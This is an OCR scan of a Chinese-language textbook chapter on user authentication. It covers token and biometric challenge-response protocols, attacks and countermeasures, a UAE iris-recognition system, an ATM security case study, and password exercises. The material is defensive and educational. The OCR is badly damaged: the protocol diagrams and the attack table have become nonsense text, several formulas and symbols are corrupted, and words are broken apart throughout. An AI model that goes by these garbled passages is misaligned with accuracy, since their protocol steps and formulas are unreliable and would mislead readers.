适当 的 散 列 函数 10， 口令 在 传输 过 程 中 是 不 会 被 捕获 到 的 。 最 后 ,使 用 随机 数 作为 函数 f() 的 
参数 可 以 抵御 重 放 攻击 。 


3.5.2 令 牌 协议 


图 3-12b 给 出 了 一 个 令 牌 协议 认证 的 简单 例子 。 和 前 面 一 样 ， 用 户 首先 发 送 他 的 用 户 身份 
给 远程 主机 。 远 程 主机 返回 需 在 响应 中 使 用 的 随机 数 和 验证 函数 AO 和 .0 的 标识 符 。 在 用 户 
端 ， 令 牌 提供 了 一 个 验证 码 (passcode) WW'。 令 牌 存储 一 个 静态 验证 码 或 者 生成 一 个 一 次 性 的 
随机 验证 码 。 对 于 一 次 性 的 随机 验证 码 ， 令 牌 必须 以 一 定 的 方式 和 远程 主机 进行 同步 。 无 论 哪 
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种 情况 ， 用 户 通 过 输入 口令 已 来 激活 验证 码 ， 这 个 口令 仅仅 被 用 户 和 令 牌 共享 ， 而 与 远程 主 
机 无 关 。 令 牌 使 用 函数 ,Ar' ACW) 的 值 对 远程 主机 进行 响应 。 对 于 静态 验证 码 ， 远 程 主机 存储 
TRON (WU) ; 对 于 动态 验证 码 ， 远 程 主机 需要 生成 一 个 一 次 性 的 验证 码 (与 由 令 牌 产生 
的 验证 码 同步 )， 并 且 计 算 它 的 散 列 值 。 之 后 的 认证 过 程 同 口令 协议 认证 过 程 一 样 。 


e yg è% 





客户 端 y 远程 主机 客户 端 
0, 用 户 ——> 忆 用 户 “一 -一己 
(0M hoe ON HLA ee 
r, » h ` > T, > . b 
‘ D0 hO, SO, 函数 
MET i AARD 到 令 牌 提供 
"7 的 返回 De Ar hP) 的 验证 码 fy nw) SAWY- 
Ke. WP(U))) rr 的 返回 一 一 一 一 > hr.h(W(U))) 
如 果 成 立 则 如 果 成 立 则 
yes/no yes, 否则 no 3 yes, 否则 no 
yes/no 
a) 口令 协议 b) 令 牌 协议 
rs = 
> Í. > Í 
india 远程 主机 aPN y 远程 主机 
u, He 一 二 > u, 用 户 一 一 一 > 
r， 随 机 数 r, 随机 数 
{rE0} EQ, 函数 x, 随机 质询 序列 
{250 EO, 函数 
特征 Ar’, D’, BT’) Bi x' > BS’) E(r',BS'(x') 
D'， 生 物 特征 一 一 一 入 EEr, PBT) "的 返回 ED pote) 
采集 设备 (r',P',BT’) (r,BS'(x')) 
rr 的 返回 r'=r, D=D', BT’=BT(U) 从 (r' BS'(x')) PHB’ 
oe r'=r, x'=x, B= 
yes/no ”否则 no BID 如果 成 立 则 
< yes/no _yes， 否则 no 
c) 静态 生物 特征 认证 协议 d) 动态 生物 特征 认证 协议 


图 3-12 用 于 远程 用 户 认证 的 基本 质询 - 响应 协议 
来 源 : 基于 [OGOR03] 


3.5.3 ”静态 生物 特征 认证 协议 


图 3-12c 是 一 个 使 用 静态 生物 特征 的 用 户 认 证 协议 的 例子 。 和 前 面 一 样 ， 用 户 发 送 ID 给 
远程 主机 ， 远 程 主机 通过 随机 数 + 和 加 密 函 数 的 标识 符 进行 响应 。 在 用 户 端 ， 有 一 个 控制 生物 
特征 采集 设备 的 客户 端 系统 。 该 系统 根据 用 户 的 生物 特征 B' 生 成 一 个 生物 特征 模板 BT, JE 
FS Er’, D', B87)， 其 中 D' 表 示 该 特定 的 生物 特征 采集 设备 。 远 程 主机 通过 对 收 到 的 密 文 消 
息 进行 解密 来 得 到 传输 的 三 个 参数 ， 并 与 远程 主机 中 存储 的 数据 进行 对 比 。 对 于 匹配 的 情况 ， 
一 定 有 r'=r, Hit, BT 与 远程 主机 中 存储 的 用 户 模板 之 间 的 匹配 分 数 也 一 定 会 超过 预先 设置 
的 闭 值 。 最 后 ， 主 机 还 需要 通过 判断 生物 特征 采集 设备 的 ID 是 否 存 在 于 主机 数据 库 中 的 注册 
设备 列表 来 对 生物 特征 采集 设备 进行 简单 的 认证 。 


74 BED tEPZARKS RE 


3.5.4 动态 生物 特征 认证 协议 


图 3-12d 是 一 个 使 用 动态 生物 特征 的 用 户 认证 协议 的 例子 。 其 和 静态 生物 特征 认证 最 主 
要 的 不 同 是 远程 主机 提供 了 一 个 随机 序列 x 以 及 一 个 随机 数 r 作为 质询 。 这 个 质询 序列 是 由 数 
字 、 字 符 或 者 单词 组 成 的 序列 。 位 于 客户 端的 用 户 必须 通过 发 音 (讲话 者 验证 )、 打 字 (键盘 动 
态 验证 ) 或 者 手写 (笔迹 验证 ) 来 产生 一 个 生物 特征 序列 信号 BS'(x)。 之 后 ， 客 户 端 要 对 生物 
信号 和 随机 数 加 密 。 远 程 主机 在 接收 到 信息 后 进行 解密 操作 ， 收 到 的 随机 数 ”必须 和 最 初 作 
为 质询 的 随机 数 完全 匹配 。 此 外 ， 远 程 主机 根据 输入 的 生物 特征 信号 8S"(x)、 已 存储 的 该 用 
户 的 模板 BT(U) 及 原始 信号 x 生成 一 个 比较 值 。 如 果 该 比较 值 超过 了 预 设 的 阐 值 ， 那 么 用 户 就 
可 通过 认证 。 


36 ”用户 认证 中 的 安全 问题 


与 任何 一 种 安全 服务 一 样 ， 用 户 认证 ， 特 别 是 远程 用 户 认 证 ， 都 会 遭受 各 种 各 样 的 攻击 。 
102) 223-4 ( 源 自 [OGOR03]) 总 结 了 用 户 认证 中 主要 的 攻击 方式 ， 并 依据 认证 手段 的 类 型 对 其 进行 
103| 了 分 解 。 该 表 的 大 部 分 内 容 是 自 解释 的 ， 我 们 只 对 表 中 的 某 些 条 目 加 以 扩展 。 


表 3-4 ”一些 潜在 攻击 、 易 受 攻击 的 认证 手段 与 典型 的 防范 措施 


a @ AUTAR 
ER, Rd RO 
客户 端 攻击 RRN, BRISA 
AUA, UR 


数据 库 
JAB (shoulder surfing) 1... 
ne eee 盗窃 、 擅 造 硬件 多 因素 认证 ; 使 用 防止 臭 改 的 令 牌 
生物 特征 复制 ORIN) 生物 特征 对 采集 设备 复制 检测 和 认证 


重 放 被 窃取 的 口令 响应 信息 | ”质询 - 响应 协议 
oP 重 放 被 窃取 的 认证 码 响应 信息 “| ”质询 - 响应 协议 ， 一 次 性 验证 码 


生物 特征 重 放 被 窃取 的 生物 特征 模版 响 | ”防止 采集 设备 端的 复制 操作 ; 通过 
应 信息 质询 - 响应 协议 进行 设备 认证 
口令 、 令 牌 、 、 客户 端 认 证 或 者 采用 安全 可 信和 的 采 
特洛伊 木马 生物 特征 安装 窃听 软件 或 信息 截获 设备 集 设 备 
口令 、 令 牌 、| 通过 多 次 失败 的 认证 将 用 户 锁 


客户 端 攻击 client attack) 是 在 不 访问 远程 主机 或 不 干扰 通信 信道 的 情况 下 ， 敌 手 试图 伪 

装 成 一 个 合法 用 户 来 完成 用 户 认证 的 攻击 行为 。 对 于 一 个 基于 口令 认证 的 系统 ， 敌 手 可 能 会 试 

图 对 口令 进行 多 种 猜 解 ， 猜 测 可 能 的 用 户口 令 。 一 种 极端 情况 是 尝试 所 有 可 能 的 口令 。 阻 止 这 

[104| 种 攻击 的 一 种 方法 是 选择 既 长 又 不 可 预测 的 口令 。 事 实 上 ， 这 种 口令 的 粹 很 大 ; HRB, 
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要 很 多 位 来 表示 。 另 外 一 种 解决 方法 ， 是 限制 指定 信 源 在 一 定时 间 内 的 尝试 次 数 。 

令 牌 可 以 通过 一 个 彤 很 低 的 PIN 或 者 口令 产生 一 个 业 很 高 的 验证 码 ， 以 防止 穷 举 搜索 。 
即便 是 敌手 能 够 猜 到 或 者 获取 了 口令 ， 但 是 他 仍然 必须 获得 物理 令 牌 才能 成 功 。 

主机 攻击 (host attack) 是 直接 对 存储 在 主机 上 的 用 户 文件 进行 的 攻击 ， 主 机 上 存储 着 用 
户口 令 、 令 牌 认 证 码 或 者 生物 特征 模板 。3.2 节 已 讨论 了 关于 口令 安全 的 注意 事项 。 对 于 令 牌 ， 
可 以 使 用 一 次 性 验证 码 ， 从 而 避免 认证 码 在 主机 中 存储 。 用 户 的 生物 特征 很 难保 证 其 安全 ， 因 
为 这 些 是 用 户 的 身体 特征 。 对 于 静态 生物 特征 认证 ， 可 以 加 入 对 生物 特征 采集 设备 的 认证 。 对 
于 动态 生物 特征 的 认证 ， 可 以 采用 质询 - 响应 协议 加 强 安全 性 。 

在 口令 认证 的 语 境 下 ， 窃 听 ( eavesdropping) 是 指 敌 手 试图 通过 观察 用 户 ， 找 到 口令 的 手 
写 副 本 或 者 类 似 的 用 户 与 敌手 近 距 离 接触 的 机 会 而 得 知 口令 。 另 外 一 种 窃听 口令 的 方式 是 按键 
记录 (键盘 记录 )。 它 通过 安装 在 用 户 计 算 机 上 的 恶意 程序 捕捉 按键 记录 ， 通 过 事后 分 析 来 获 
取 口 令 。 依 赖 于 多 因素 认证 (如 口令 加 令 牌 或 口令 加 生物 特征 ) 的 系统 可 以 抵御 此 类 攻击 。 对 
于 令 牌 ， 类 似 的 威胁 是 令 牌 被 盗窃 (theft) 或 者 对 令 牌 进行 物理 复制 。 同 样 ， 使 用 多 因素 认证 ， 
相对 于 纯 令 牌 认 证 协议 ， 可 以 防止 在 令 牌 被 盗窃 的 情况 下 产生 的 安全 威胁 。 对 生物 特征 协议 的 
类 似 威胁 是 复制 ( copy) 或 模仿 生物 特征 参数 而 生成 想 要 的 模板 。 动 态 生 物 特征 不 易于 受到 此 
类 攻击 。 对 于 静态 生物 特征 ， 对 数据 采集 设备 进行 认证 是 一 个 有 效 的 对 抗 手段 。 

重 放 (replay) 是 敌手 对 以 前 截获 到 的 用 户 响 应 消息 进行 重 放 的 一 种 攻击 。 对 于 此 类 攻击 
最 常用 的 对 抗 措施 是 质询 - 响应 协议 。 

在 特洛伊 木马 攻击 (Trojan horse) 中 ， 应 用 或 物理 设备 冒充 成 认证 服务 所 使 用 的 应 用 或 物 
理 设备 来 捕获 用 户口 令 、 验 证 码 或 生物 特征 信息 。 之 后 ， 敌 手 可 以 使 用 捕获 到 的 信息 冒充 合法 
用 户 。 一 个 简单 例子 就 是 使 用 伪造 的 银行 终端 机 来 截获 用 户 ID 和 口令 的 组 合 信息 。 

拒绝 服务 ( denial-of service) 攻击 是 试图 通过 大 规模 的 认证 请 求 使 认证 服务 失效 。 一 种 更 
具 可 选 性 的 攻击 通过 下 面 的 方法 拒绝 对 特定 用 户 的 服务 : 多 次 尝试 登录 导致 尝试 次 数 达 到 系统 
设 定 的 阔 值 而 使 得 该 用 户 由 于 尝试 次 数 过 多 而 被 锁定 。 一 种 包含 令 牌 的 多 因素 认证 协议 可 以 防 
止 这 种 攻击 ， 由 于 敌手 必须 首先 得 到 一 个 令 牌 ， 因 此 会 使 得 这 种 攻击 无 效 。 


3.7 ”实际 应 用 : 虹膜 生物 特征 认证 系统 


作为 生物 特征 认证 系统 的 一 个 例子 ， 我 们 研究 了 为 阿拉 伯 联 合 酋长 国 (简称 阿联酋 , UAE) 
开发 的 用 于 入 境 安全 监测 的 虹膜 生物 特征 认证 系统 [DAUG04，TIRO05，NBSP08]。 阿 联 酋 的 
经 济 主 要 依赖 国外 劳动 力 ， 而 且 本 国 也 逐渐 成 为 国际 化 的 旅游 景点 。 因 此 ， 相 对 于 其 国土 面 
积 ， 阿 联 酋 的 人 境 游 客 总 量 着 实 巨 大 。 通 常 一 天 内 ， 通 过 七 个 国际 机 场 、 三 个 陆地 港口 以 及 七 
个 海岸 港口 ， 会 有 共计 超过 6500 名 乘客 进入 阿联酋 。 因 而 高 效 地 管理 大 量 人 境 游客 成 为 一 个 
必须 面 对 的 安全 挑战 。 特 别 值得 关注 的 是 ， 许 多 被 阿 联 疯 驱 逐 的 人 经 常会 试图 再 次 进入 。 传 统 
的 阻止 再 次 进入 的 方法 涉及 个 人 身份 验证 ， 包 括 检查 姓名 、 出 生日 期 以 及 其 他 基本 信息 。 但 
是 ,这样 做 是 存在 风险 的 。 当 事 人 在 被 驱逐 后 可 以 修改 其 个 人 信息 ， 并 利用 一 个 与 原 护 照 截 然 
不 同 的 护照 人 境 。 

为 了 对 抗 这 种 再 人 行为 ， 阿 联 酋 政府 决定 引 人 生 物 特 征 认 证 系统 ， 且 该 系统 具备 以 下 
特点 : 

e 从 海量 的 人 群 中 识别 出 个 人 。 

© 依赖 于 某 项 长 期 不 变 的 生物 特征 。 

e 该 生物 特征 易于 提取 。 

e 易于 使 用 。 
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对 于 大 量 交通 应 用 能 够 做 到 实时 响应 。 
安全 无 伤害 。 
能 够 在 超大 的 范围 内 进行 区 分 并 具备 顶尖 的 性 能 。 
价格 上 负担 得 起 。 

综 上 ， 选 择 使 用 虹膜 认证 最 为 简洁 高 效 。 全 世界 没有 两 个 相同 的 虹膜 ， 即 使 是 双胞胎 或 同 
一 个 人 的 左 眼 和 右 眼 。 

认证 系统 的 实现 涉及 登记 和 身份 检查 。 所 有 被 驱逐 的 外 来 人 士 必须 在 某 一 个 登录 中 心 进行 
虹膜 扫描 ， 并 将 扫描 信息 记 入 中 央 数 据 库 。 阿 联 疝 全 部 17 个 人 境 口 均 设 有 虹膜 扫描 仪 。 一 个 
虹膜 识别 相机 会 在 距 眼 球 5 至 24 英寸 的 地 方 (取决 于 相机 ) 拍摄 黑白 图 片 。 相 机 采用 无 害 的 
近 红 外 照明 技术 ,该 技术 几乎 不 可 见 且 绝 对 安全 ， 类 似 电视 的 远程 愧 控 。 为 了 提取 出 虹膜 的 一 
部 分 ， 软 件 首先 采集 图 片 以 确定 虹膜 的 内 外 边界 及 眼 瞪 的 轮廓 。 接 着 ,软件 将 虹膜 的 纹理 转化 
为 数字 编码 ， 类 似 DNA 序列 编码 。 虹 膜 的 独 有 特征 会 被 捕捉 到 编码 中 ， 并 可 与 数据 库 中 已 存 
储 的 虹膜 编码 进行 比较 以 判断 是 否 匹 配 。 通 过 分 布 式 网 络 (参见 图 3-13 )， 所 有 入境 乘客 的 虹 
膜 编 码 可 被 实时 地 全 方位 地 与 中 央 数 据 库 中 的 编码 进行 比较 。 


虹膜 扫描 仪 虹膜 扫描 仪 





图 3-13 ”阿联酋 虹膜 认证 系统 的 设备 总 体 架 构 


值得 注意 的 是 ， 虹 膜 认证 已 远 不 止 是 一 个 验证 身份 的 工作 ， 其 中 更 主要 的 工作 还 是 艰巨 
的 计算 任务 。 在 这 种 情况 下 ， 每 名 入 境 乘客 的 虹膜 图 像 需 要 与 整个 数据 库 中 的 已 知 图 像 进行 比 
较 。 考 虑 到 当前 的 客流 量 和 数据 库 的 大 小 ， 每 天 的 虹膜 比较 次 数 超过 90 亿 次 。 

与 其 他 安全 系统 一 样 ， 总 会 有 敌手 寻找 应 对 虹膜 认证 系统 的 方法 。 曾 有 被 禁止 人 境 的 侨民 利 
用 滴 眼 液 扩张 虹膜 ， 以 通过 虹膜 认证 系统 而 再 次 进入 阿联酋 。 阿 联 酋 官方 不 得 不 采用 了 一 些 新 的 
安全 措施 以 监测 此 类 行为 。 新 算法 和 逐步 计算 流程 的 实施 有 助 于 判断 虹膜 处 于 常态 还 是 经 过 扩张 。 


3.8 案例 学 习 : ATM 系统 的 安全 问题 
提供 独立 审计 服务 的 Redspin 公司 ， 最 近 发 布 了 一 份 描述 ATM (自动 柜员 机 ) 使 用 方面 的 
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安全 漏洞 报告 ， 对 很 多 中 小 型 的 ATM 发 卡 机 构 产 生 了 影响 。 报 告 使 用 一 些 案例 来 说 明 单 独 使 
用 密码 功能 和 服务 并 不 能 确保 真正 的 安全 ,但 它们 必须 作为 系统 的 重要 部 分 来 实现 。 
我 们 先 来 定义 本 节 使 用 的 术语 : 
© A (cardholder): 拥有 借 记 卡 的 个 人 。 通 常 该 持 卡 人 同时 有 义务 偿还 该 卡 使 用 过 程 
中 的 全 部 费用 。 
© 发 卡 机 构 (issuer): 发 行 借 记 卡 给 持 卡 人 的 机 构 。 这 个 机 构 负 责 持 卡 人 的 账户 并 授权 所 
有 交易 。 银 行 和 信用 机 构 就 是 典型 的 发 卡 机 构 。 
e 处 理 商 (processor): 为 发 卡 机 构 提 供 核 心 数据 处 理 (口令 认证 和 账户 信息 更 新 )、 电 子 
资金 转账 (Electronic Fund Transfer, EFT) 以 及 其 他 服务 的 组 织 机 构 。 电 子 资金 转账 
服务 允许 发 卡 机 构 访 问 连接 全 世界 的 销售 点 (Point Of Sale, POS) 设备 和 ATM 的 地 
区 和 国内 网 络 。 例 如 ， 富 达 国 家 金融 公司 (Fidelity National Financial) 和 Jack Henry & 
Associates 都 是 这 样 的 机 构 。 

客户 期 望 ATM 提供 每 周 7 天、 每 天 24 小 时 的 服务 。 对 于 很 多 中 小 型 的 发 卡 机 构 ， 通 过 
处 理 商 来 提供 数据 处 理 和 电子 资金 转账 /ATM 服务 可 以 降低 运营 成 本 。 每 项 服务 一 般 要 求 使 用 
租用 的 专用 线路 或 虚拟 线路 来 连接 发 卡 机 构 和 处 理 商 。 

AY 2003 年 以 前 的 典型 配置 包括 发 卡 机 构 、 处 理 商 以 及 ATM 终端 设备 ， 如 图 3-14a 所 
示 。ATM 终端 设备 通过 租用 的 线路 直接 连接 到 处 理 商 而 不 是 拥有 该 ATM 的 发 卡 机 构 。 使 用 专 
用 线路 可 以 防止 数据 在 传输 过 程 中 被 恶意 截获 。 为 了 增加 安全 性 ， 从 ATM 终端 设备 到 处 理 商 
传送 的 消息 的 PIN 部 分 使 用 DES 加 密 。 处 理 商 连接 到 EFT (电子 资金 转账 ) 交换 网 络 使 得 持 卡 
人 可 以 从 任何 ATM 终端 设备 访问 自己 的 账户 。 采 用 图 3-14a 的 配置 ， 一 笔 交易 的 处 理 过 程 如 下 : 
用 户 在 ATM 终端 设备 上 插入 他 的 卡 ， 并 输入 PIN, ATM 终端 设备 对 PIN 进行 加 密 并 将 其 传输 到 
处 理 商 作为 认证 请 求 的 一 部 分 。 之 后 ， 处 理 商 更 新 客户 的 账户 信息 并 发 送 一 个 回应 消息 。 





( 如 Fidelity ) 
发 卡 机 构 拥 有 的 ATM 


a) 到 处 理 商 的 点 对 点 连接 


EFT 交 换 ， 
B-E 


处 理 商 
(如 Fidelity ) 


b) 到 处 理 商 的 共享 连接 
图 3-14 ATM 体系 结构 。 很 多 中 小 型 的 借 记 卡 发 卡 机 构 与 处 理 商 签订 合同 由 其 提供 核心 数据 
处 理 和 电子 资金 转账 (EFT) 服务 。 银 行 的 ATM 机 可 以 直接 与 处 理 商 或 银行 连接 





发 卡 机 构 拥有 的 ATM 
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在 21 世纪 初 ， 世 界 范围 内 的 各 大 银行 开始 使 用 新 的 运行 Windows 的 系统 来 代替 ATM 终 
端 设 备 上 的 采用 IBM OS/2 操作 系统 的 老 系 统 。 如 此 大 规模 地 向 Windows 的 移植 是 由 很 多 原 
因 造 成 的 ， 包 括 IBM 公司 到 2006 年 停止 对 OS/2 操作 系统 支持 的 决定 、 来 自 MasterCard 国际 
组 织 和 Visa 国际 组 织 等 信用 卡 组 织 引 入 更 强 的 三 重 DES 加 密 的 市 场 压 力 以 及 美国 调控 机 构 要 
求 对 失效 用 户 引 入 新 特征 的 压力 。 很 多 银行 ， 例 如 那些 被 Redspin 公司 审计 的 银行 ， 在 引入 
Windows 和 三 重 DES 的 同时 ， 还 使 用 了 很 多 其 他 的 安全 增强 措施 ， 特 别 是 采用 TCP/IP 协议 进 
行 网 络 传输 。 

由 于 发 卡 机 构 通常 运行 与 Internet 连接 的 局 域 网 和 采用 TCP/IP 协议 的 内 联网 (intranet), 
这 就 使 得 将 ATM 与 发 卡 机 构 网 络 连接 ， 仅 维护 一 条 连接 到 处 理 商 的 专用 线路 的 方案 颇具 吸 
引力 ， 这 个 配置 如 图 3-14b 所 示 。 这 种 配置 方法 为 发 卡 机 构 节省 了 每 月 昂贵 的 线路 费用 ， 并 
使 ATM 易于 由 发 卡 机 构 管理 。 在 这 种 配置 中 ， 由 ATM 发 送 至 处 理 商 的 数据 要 穿越 发 卡 机 构 
网 络 后 才能 发 送 给 运营 商 。 因 此 ， 客 户 信息 处 于 发 卡 机 构 网 络 的 这 段 时 间 内 是 易 受 到 安全 威 
胁 的 。 

升级 到 新 的 ATM 终端 操作 系统 和 新 的 通信 配置 后 ， 安 全 方面 唯一 的 加 强 就 是 对 PIN 使 用 
了 三 重 DES 而 不 是 DES 加 密 。 而 ATM 终端 设备 发 送 的 其 他 数据 都 是 明文 传输 的 ， 包 括 卡号 、 
有 效 期 、 账 户 余 额 、 提 款 金额 。 黑 客 可 以 从 内 部 或 通过 Internet 接 人 到 银行 网 络 ， 从 而 可 以 访 
问 每 一 笔 ATM 交易 。 

以 上 描述 的 这 种 情况 会 导致 两 个 主要 的 漏洞 : 

e 机密 性 : 卡号 、 有 效 期 、 账 户 余额 这 些 信 息 可 以 用 于 网 上 购物 ,或 者 用 于 复制 一 张 卡 

来 进行 基于 签名 的 交易 。 

e 完整 性 : 在 通信 中 没有 提供 安全 措施 以 防止 攻击 者 注入 或 修改 传输 中 的 数据 。 如 果 数 
据 在 通信 中 被 敌手 截获 到 ， 那 么 攻击 者 就 可 以 冒充 处 理 商 或 者 ATM。 攻 击 者 一 旦 伪装 
成 运营 商 ， 那 么 攻击 者 就 可 以 直接 在 ATM 上 进行 转账 ， 而 真正 的 处 理 商 却 对 这 笔 交易 
一 无 所 知 。 如 果 攻 击 者 截获 到 用 户 的 账户 和 加 密 的 PIN 信息 ， 那 么 账户 的 安全 在 改变 
ATM 加 密 密 钥 之 前 将 一 直 受到 威胁 ， 使 得 敌手 可 以 修改 账户 余额 或 进行 转账 。 

Redspin 公司 应 对 这 些 安全 威胁 为 银行 提供 了 很 多 建议 。 一 种 短期 的 解决 方案 包括 把 ATM 
的 流量 从 整个 网 络 的 流量 中 分 离 出 来 ， 可 以 通过 使 用 严格 的 防火 墙 过 滤 规 则 ， 或 者 物理 地 对 整 
个 网 络 进行 分 割 。 另 一 个 短期 方案 是 在 ATM 流量 通过 的 路 由 器 之 间 进 行 网 络 级 的 加 密 。 

长 期 的 方案 包括 更 换 应 用 级 软件 ， 对 在 网 络 中 传输 的 所 有 客户 相关 信息 进行 加 密 保 护 。 为 
确保 数据 的 完整 性 ， 在 ATM 和 处 理 商 之 间 需 要 进行 设备 对 设备 的 认证 ， 并 使 用 质询 - 响应 协 
议 来 对 抗 重 放 攻击 。 


3.9 ”推荐 读物 


[OGOR03] 是 关于 本 章 中 所 讨论 的 话题 的 权威 性 综述 文章 ，[BURR13] 也 是 一 篇 值得 一 读 
的 综述 。[SCAR09] 全 面 地 涵盖 了 有 关口 令 选 择 和 管理 的 诸多 问题 。 


BURRI3 Burr, W. et al. Electronic Authentication Guideline. Gaithersburg, MD: 
National Institute of Standards and Technology, Special Publication 
800-63-2, August 2013. 

OGOR03 O'Gorman, L. “Comparing Passwords, Tokens and Biometrics for User 
Authentication.” Proceedings of the IEEE, December 2003. 

SCAR09a Scarfone. K., and Souppaya, M. Guide to Enterprise Password Management 
(Draft), NIST Special Publication SP 800-118 (Draft). April 2009. 


3.10 ”关键 术语 、 复 习题 和 习题 


关键 术语 


biometric (生物 特征 ) 

challenge-response protocol (质询 - 响应 协议 ) 
claimant〔 请 求 者 ) 
credential (WEB, WE) 

credential service provider (CSP， 证 书 服务 提供 商 ) 
dynamic biometric (动态 生物 特征 ) 

enroll (注册 ) 

hashed password( 散 列 口令 ) 

identification〔 识 别 ) 

memory card (存储 卡 ) 

password (口令 ) 

rainbow table (彩虹 表 ) 


复习 题 


3.1 ”用户 认证 通常 的 四 种 方法 是 什么 ? 
3.2 ”列举 并 简单 描述 口令 保密 的 主要 威胁 。 
3.3 ”保护 用 户口 令 文件 的 两 个 常用 方法 是 什么 ? 


BIF APKE 


registration authority (RA， 注 册 中 心 ) 
relying party (RP， 依 赖 方 ) 

salt ( 盐 值 ) 

shadow password file (影子 口令 文件 ) 
smart card (智能 卡 ) 

static biometric (静态 生物 特征 ) 
subscriber (用 户 ， 订 户 ) 

token ( 令 牌 ) 

user authentication (用 户 认证 ) 
verification (验证 ) 

verifier (验证 者 ) 


3.4 列举 并 简单 描述 设置 和 选择 口令 的 四 种 常用 方法 。 


3.5 请 说 明 简 单 存储 卡 和 智能 卡 的 区 别 。 


3.6 ”列举 并 简单 描述 生物 特征 认证 方法 所 使 用 的 主要 身体 特征 。 
3.7 请 解释 在 生物 特征 认证 中 使 用 的 术语 : 注册 、 验 证 和 识别 。 
3.8 定义“ 误 匹配 率 ” 和 “ 漏 匹配 率 " ， 并 解释 阔 值 在 两 者 的 关系 中 的 作用 。 


3.9 描述 “质询 - 响应 协议 ”的 原理 。 
习题 


3.1 解释 以 下 口令 是 否 合适 : 
a. YK344 


b. mfmitm (for my favorite movie is tender mercies) 


c. Nataliel 

d. Washington 
e. Aristotle 

f. tv9stove 

g. 12345678 
h. dribgib 


3.2 早期 试图 强迫 用 户 使 用 不 可 预测 的 口令 ， 包 括 系统 给 用 户 分 配 的 口令 。 
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口令 的 长 度 为 8 个 字符 ， 并 


3.3 


且 是 从 包括 了 小 写字 母 和 数字 的 字符 集中 选择 的 。 口 令 是 由 具有 2" 个 可 能 起 始 值 的 随机 数 产生 的 。 
依照 目前 的 技术 水 平 ， 搜 索 所 有 36 字符 的 字母 表 中 的 长 度 为 8 的 字符 串 需要 112 年 的 时 间 。 不 幸 
的 是 ， 这 并 不 能 真实 地 反映 口令 面临 的 安全 性 问题 。 请 解释 其 中 的 原因 。 

从 26 个 字母 中 选择 4 个 字符 作为 口令 ， 假 设 敌 手 每 秒 钟 只 可 以 尝试 一 次 口令 破解 。 

a. 如 果 直 到 一 次 尝试 结束 时 才 给 敌手 一 个 反馈 信息 ， 那 么 发 现 正确 口令 的 预计 时 间 是 多 少 ? 
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3.4 


3.5 


3.6 


3.7 


3.8 


3.9 


3.12 


F—-4ED WEMNKAGRKARE 


b. 如 果 在 每 次 输入 不 正确 的 字符 时 就 会 有 错误 的 标志 返回 给 敌手 ， 那 么 发 现 正确 口令 的 预计 时 间 是 
多 少 ? 
假设 长 度 为 的 源 数 据 元 素 通 过 某 种 方式 映射 到 一 些 具 有 相同 格式 的 长 度 为 p 的 目标 元 素 上 。 如 果 
每 一 个 数字 都 有 r 个 值 可 取 ， 那 么 源 数 据 元素 的 数量 是 *， 目 标 元 素 的 数量 较 小 ， 为 r?。 一 个 数据 
TER x:， 被 映射 到 目标 数据 元 素 Yio 
a. 敌手 一 次 就 可 以 通过 目标 元 素 正确 地 选 出 源 数据 元 素 的 概率 是 多 大 ? 
b. 如 果 另 外 一 个 不 同 的 源 数据 元 素 xk (x Ay) 也 可 以 映射 到 同一 个 目标 数据 元 素 yy，xi 被 敌手 选中 
的 概率 是 多 大 ? 
c. 攻击 者 只 尝试 一 次 就 能 选中 正确 的 目标 数据 元 素 的 概率 是 多 大 ? 
一 个 语音 口令 生成 器 ， 可 以 随机 生成 一 个 由 两 部 分 组 成 的 6 个 字符 的 口令 ,口令 每 一 个 组 成 部 分 的 
形式 为 CVC (辅音, 元 音 ， 辅 音 )。 其 中 V= {a e, i, o, u} 是 元 音字 母 的 集合 ，C= 六 。 
a. 在 这 种 情况 下 口令 的 总 数 可 能 有 多 少 个 ? 
b. 攻击 者 猜 中 口令 的 概率 是 多 少 ? 
假设 口令 被 限定 在 95 个 可 打印 的 ASCII 字符 中 选择 ， 并 且 所 有 的 口令 都 是 10 个 字符 长 度 。 如 果 一 
个 口令 破解 者 每 秒 钟 可 以 加 密 640 万 个 口令 ,那么 在 UNIX 系统 中 ， 他 需要 花 多 长 的 时 间 才 能 测试 
完成 所 有 可 能 的 口令 ? 
由 于 UNIX 口令 系统 存在 着 众所周知 的 脆弱 性 ，SunOS 4.0 文档 建议 删除 口令 文件 ， 并 使 用 一 种 公 
众 可 读 文件 /etc/publickey 取而代之 。 对 于 用 户 A 而 言 ， 该 文件 中 与 用 户 A 对 应 的 条 目 包括 用 户 身 
IDa, APAS PU, 和 对 应 的 私 钥 PR.。 这 个 私 钥 PR 是 经 过 DES 加 密 的 ， 而 密 钥 是 由 用 户 登 录 
口令 已 派生 的 。 当 用 户 A 登录 到 系统 时 ， 系 统 通过 EPa, PR.) 对 进行 解密 来 得 到 PR。。 
a. 系统 如 何 验证 以 确保 口令 P, 的 正确 性 ? 
b. 针对 这 种 系统 ， 敌 手 如 何 进行 攻击 ? 
我 们 知道 ， 在 UNIX 系统 的 口令 方案 中 引入 盐 值 大 大 地 增加 了 口令 猜 解 的 难度 (难度 是 原来 的 4096 
倍 )。 但 是 ， 盐 值 以 明文 的 形式 和 经 过 加 密 的 口令 一 起 存放 在 口令 文件 中 ， 攻 击 者 无 须 猜 解 就 可 以 
得 到 盐 值 以 及 加 密 的 口令 。 那 么 ， 为 什么 可 以 断言 使 用 盐 值 能 够 提高 口令 的 安全 性 ? 
如 果 你 已 经 成 功 地 回答 了 习题 3.8 中 的 问题 ， 并 且 理 解 了 盐 值 的 意义 。 那 么 另 一 个 问题 是 ， 有 没有 
可 能 通过 显著 增加 盐 值 的 长 度 (比如 增加 到 24 位 或 48 位 ) 来 完全 避免 所 有 的 口令 攻击 ? 
参考 3.2 节 介 绍 的 Bloom 过 滤器 (Bloom filter), ZX k AB RANMA, NABI TA, D 
表示 口令 字典 的 词汇 量 。 
a. 证 明 散 列表 中 等 于 0 的 位 数 的 期 望 值 可 以 表示 为 
D 
(4) 
b. 证 明 输 入 的 词汇 不 在 口令 字典 中 却 被 错误 接受 的 概率 为 
P=(1-$)! 
c. 证 明 (b) 中 的 表达 式 可 以 近似 为 
Px(1—e"™™ 
对 于 图 3-12 所 表示 的 生物 特征 认证 协议 ， 在 静态 生物 特征 认证 中 生物 特征 采集 设备 也 需要 被 认证 ， 
而 动态 生物 特征 认证 中 却 不 需要 对 生物 特征 采集 设备 进行 认证 。 请 解释 其 中 的 原因 。 
安全 快速 可 靠 登 录 ( Secure Quick Reliable Login, SQRL) 是 最 近 提 出 的 新 认证 方案 ,在 Web 站 点 
